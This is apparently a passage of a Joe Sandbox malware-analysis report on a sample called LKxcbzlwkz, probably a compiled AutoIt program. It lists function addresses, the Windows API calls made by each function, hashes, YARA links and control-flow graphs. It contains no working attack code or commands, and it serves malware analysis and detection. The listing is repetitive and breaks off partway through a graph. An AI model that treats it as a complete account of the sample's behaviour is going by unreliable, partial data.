                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2728119192-0
                                                                                                                                                                                                                                                            • Opcode ID: 68f896165689c60a77b15e348e9bcd14568464d5554ec5ac4c2887339c93c3d6
                                                                                                                                                                                                                                                            • Instruction ID: 654cbfa1d8fefa06abeba6563afdd6e3d5f820db169d2b444807b365abf91408
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68f896165689c60a77b15e348e9bcd14568464d5554ec5ac4c2887339c93c3d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D815E71604301ABD700EF65DC85F6BB3E8BF88704F10491EF64597291E775E905CB6A
                                                                                                                                                                                                                                                            Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                            • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                                                                                                                                            • API String ID: 2574300362-3542929980
                                                                                                                                                                                                                                                            • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                                                                                                                                            • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                                                                                                                                                                            Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 48322524-0
                                                                                                                                                                                                                                                            • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                                                                                                                            • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                                                                                                                                                            Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                                                                                                                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 901099227-0
                                                                                                                                                                                                                                                            • Opcode ID: 2766dd017a35a582f281a5a962d2d1cd72be87eede06af1684fc2a386cf4a680
                                                                                                                                                                                                                                                            • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2766dd017a35a582f281a5a962d2d1cd72be87eede06af1684fc2a386cf4a680
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                                                                                                                                                            Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                                                                                                            • Opcode ID: f352005ce42f91404d0a7346c40795203df513899573c6876ba831088cced4f9
                                                                                                                                                                                                                                                            • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f352005ce42f91404d0a7346c40795203df513899573c6876ba831088cced4f9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                                                                                                                                                                            Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                                                                                                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                                                                                                                            • API String ID: 1762048999-758534266
                                                                                                                                                                                                                                                            • Opcode ID: 9980c18296cc38a6d47203e1dc558ba7b68c36983024eec6b80bd2060408f93d
                                                                                                                                                                                                                                                            • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9980c18296cc38a6d47203e1dc558ba7b68c36983024eec6b80bd2060408f93d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                                                                                                                                                                                            Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 1230 452ac7-452b53 call 422240 call 442c5a call 4150d1 call 41313c 1239 452c30-452c3a call 452719 1230->1239 1240 452b59-452b6a call 452719 1230->1240 1244 452c3f-452c41 1239->1244 1245 452b6c-452b77 1240->1245 1246 452b7a-452c2e call 413a0e call 411567 call 411536 call 413a0e call 411536 * 2 1240->1246 1244->1245 1247 452c47-452d18 call 414d04 * 8 call 431e1f call 4149c2 1244->1247 1246->1247 1280 452d28-452d43 call 442bb4 1247->1280 1281 452d1a-452d25 1247->1281 1284 452de2-452df7 call 414a46 1280->1284 1285 452d49 1280->1285 1292 452e15-452e1a 1284->1292 1293 452df9-452e12 DeleteFileW 1284->1293 1287 452d51-452d59 1285->1287 1289 452d5f 1287->1289 1290 452d5b-452d5d 1287->1290 1291 452d64-452d86 call 414d04 1289->1291 1290->1291 1302 452da9-452dcc call 432229 call 4142b6 1291->1302 1303 452d88-452da7 call 442c29 1291->1303 1294 452ea6-452ebb CopyFileW 1292->1294 1295 452e20-452e81 call 431e9e call 431e71 call 44b1a9 1292->1295 1299 452ebd-452ed6 DeleteFileW 1294->1299 1300 452ed9-452ef5 DeleteFileW call 431ddb 1294->1300 1314 452e86-452e88 1295->1314 1308 452efa-452f02 1300->1308 1315 452dd1-452ddc 1302->1315 1303->1302 1314->1300 1316 452e8a-452ea3 DeleteFileW 1314->1316 1315->1284 1317 452d4b-452d4d 1315->1317 1317->1287
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                                                                                                                                                                            • _fseek.LIBCMT ref: 00452B3B
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00452BC5
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00452C07
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00452C1C
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2054058615-0
                                                                                                                                                                                                                                                            • Opcode ID: efc87e589c62bcb95d86bbffa40c2e1c9392316a9786d64ec6d4328c26f8658a
                                                                                                                                                                                                                                                            • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efc87e589c62bcb95d86bbffa40c2e1c9392316a9786d64ec6d4328c26f8658a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                                                                                                                                                                            Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 1318 46e1a6-46e1ba 1319 46e1c0-46e1cd call 40c650 1318->1319 1320 46e45e 1318->1320 1319->1320 1326 46e1d3-46e1d7 1319->1326 1322 46e462-46e47d call 4533eb call 445ae0 1320->1322 1329 46e483-46e48a 1322->1329 1330 46e1dc-46e1e3 1322->1330 1326->1322 1331 46e2e7-46e2fa call 40f760 1330->1331 1332 46e1e9-46e214 call 45340c call 411567 call 413e1f 1330->1332 1337 46e2fc-46e30b call 403cd0 1331->1337 1338 46e30d-46e343 call 45340c call 413a0e 1331->1338 1349 46e216-46e255 call 411567 call 411536 call 45340c call 411536 1332->1349 1350 46e258-46e282 call 45340c call 411567 call 433998 1332->1350 1347 46e2c8-46e2e4 call 408f40 1337->1347 1354 46e374-46e3fa call 411567 call 411536 * 3 call 45340c call 433784 call 4339fa 1338->1354 1355 46e345-46e34d 1338->1355 1349->1350 1378 46e284-46e29c call 4111c1 1350->1378 1379 46e29e-46e2c2 call 45340c call 44bd27 1350->1379 1397 46e403-46e405 1354->1397 1398 46e3fc-46e3ff 1354->1398 1355->1354 1360 46e34f-46e371 call 411567 * 2 1355->1360 1360->1354 1378->1347 1378->1379 1379->1329 1379->1347 1399 46e436-46e444 call 408f40 1397->1399 1400 46e407-46e41e call 45340c call 452ac7 1397->1400 1398->1400 1401 46e401 1398->1401 1407 46e44b-46e45b call 431e58 1399->1407 1408 46e423-46e425 1400->1408 1401->1399 1408->1407 1410 46e427-46e431 call 403cd0 1408->1410 1410->1399
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                                                                                                                                            • API String ID: 0-1896584978
                                                                                                                                                                                                                                                            • Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                                                                                                                                                                                                            • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                                                                                                                                                                            Function 0046ED8E Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 1413 46ed8e-46ee39 call 4109e0 * 2 call 40e0a0 * 2 call 402160 call 40bc70 * 3 1430 46ee4a-46ee4e 1413->1430 1431 46ee3b-46ee47 call 4152bb 1413->1431 1433 46ee50-46ee5a call 469296 1430->1433 1434 46ee61-46ee6d call 436565 1430->1434 1431->1430 1433->1434 1440 46eec5-46eed7 call 401c90 1434->1440 1441 46ee6f-46ee77 call 436565 1434->1441 1446 46eedd-46eeec call 401c90 1440->1446 1447 46f2f9-46f305 call 436565 1440->1447 1441->1440 1448 46ee79-46ee81 GetForegroundWindow call 44cdaf 1441->1448 1446->1447 1457 46eef2-46eefd 1446->1457 1455 46f307-46f310 call 40e0a0 1447->1455 1456 46f315-46f319 1447->1456 1454 46ee86-46eec2 call 436299 call 402250 * 3 1448->1454 1455->1456 1461 46f322-46f32a 1456->1461 1462 46f31b 1456->1462 1463 46ef00-46ef1c call 461a5b 1457->1463 1465 46f335-46f339 1461->1465 1466 46f32c-46f330 call 410bc0 1461->1466 1462->1461 1463->1447 1474 46ef22-46ef36 call 445ae0 1463->1474 1471 46f34a-46f354 1465->1471 1472 46f33b-46f33f 1465->1472 1466->1465 1476 46f356-46f363 GetDesktopWindow EnumChildWindows 1471->1476 1477 46f365 EnumWindows 1471->1477 1472->1471 1473 46f341-46f345 call 410bc0 1472->1473 1473->1471 1485 46f1f5-46f209 call 445ae0 1474->1485 1486 46ef3c-46ef50 call 445ae0 1474->1486 1481 46f36b-46f385 call 4457df call 4109e0 1476->1481 1477->1481 1499 46f387-46f390 call 44cdaf 1481->1499 1500 46f395-46f3be call 402250 * 3 1481->1500 1495 46f1ce-46f1f2 call 402250 * 3 1485->1495 1496 46f20b-46f20f 1485->1496 1497 46ef56-46ef6a call 445ae0 1486->1497 1498 46f24b-46f25f call 445ae0 1486->1498 1501 46f225-46f248 call 402250 * 3 1496->1501 1502 46f211-46f21f 1496->1502 1515 46f283-46f2a2 call 432c30 IsWindow 1497->1515 1516 46ef70-46ef84 call 445ae0 1497->1516 1498->1495 1517 46f265-46f26b GetForegroundWindow 1498->1517 1499->1500 1502->1501 1515->1501 1533 46f2a4-46f2a5 1515->1533 1536 46ef86-46ef8b 1516->1536 1537 46efe1-46eff5 call 445ae0 1516->1537 1524 46f26c-46f27a call 44cdaf 1517->1524 1524->1515 1533->1524 1540 46f2a7-46f2cd call 402250 * 3 1536->1540 1541 46ef91-46efa8 call 401070 1536->1541 1547 46eff7-46f009 call 40e0a0 1537->1547 1548 46f00e-46f022 call 445ae0 1537->1548 1549 46efa9-46efb2 call 46906d 1541->1549 1547->1463 1558 46f024-46f03a call 401070 1548->1558 1559 46f03f-46f053 call 445ae0 1548->1559 1549->1463 1561 46efb8-46efde call 402250 * 3 1549->1561 1558->1549 1569 46f074-46f088 call 445ae0 1559->1569 1570 46f055-46f06f call 413190 1559->1570 1577 46f08a-46f0a4 call 413190 1569->1577 1578 46f0a9-46f0bd call 445ae0 1569->1578 1570->1463 1577->1463 1585 46f0de-46f0f2 call 445ae0 1578->1585 1586 46f0bf-46f0d9 call 413190 1578->1586 1591 46f0f4-46f10e call 413190 1585->1591 1592 46f113-46f127 call 445ae0 1585->1592 1586->1463 1591->1463 1597 46f145-46f159 call 445ae0 1592->1597 1598 46f129-46f140 call 413190 1592->1598 1603 46f17a-46f18e call 445ae0 1597->1603 1604 46f15b-46f16f call 445ae0 1597->1604 1598->1463 1610 46f1b4-46f1c8 call 44cd93 1603->1610 1611 46f190-46f195 1603->1611 1604->1495 1609 46f171-46f175 1604->1609 1609->1463 